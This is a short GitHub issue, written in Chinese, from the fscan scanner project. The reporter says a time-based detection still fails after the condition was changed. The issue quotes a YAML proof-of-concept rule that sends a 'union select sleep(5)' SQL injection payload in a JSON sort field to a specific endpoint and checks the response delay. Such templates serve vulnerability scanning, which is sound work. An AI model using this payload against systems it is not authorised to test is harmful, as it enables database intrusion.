### ISSUE TITLE
Poc目录里搜索 sleep有例子。 更换了条件  还是检测不到

### ISSUE THREAD

**Issue by Zer08Bytes** [shadow1ng/fscan#375]
Poc目录里搜索 sleep有例子。
```
name: riskscanner-list-sqli
rules:
  - method: POST
    path: /resource/list/1/10
    headers:
      Content-Type: application/json;charset=UTF-8
    body: "\
    {\"sort\":\"1)a union select sleep(5) -- -\"}\r\n\
    "
    expression: |
      response.status == 200 &&  response.duration >= 5.0
```

_Originally posted by @shadow1ng in https://github.com/shadow1ng/fscan/issues/370#issuecomment-2317125023_
            
更换了  还是检测不到
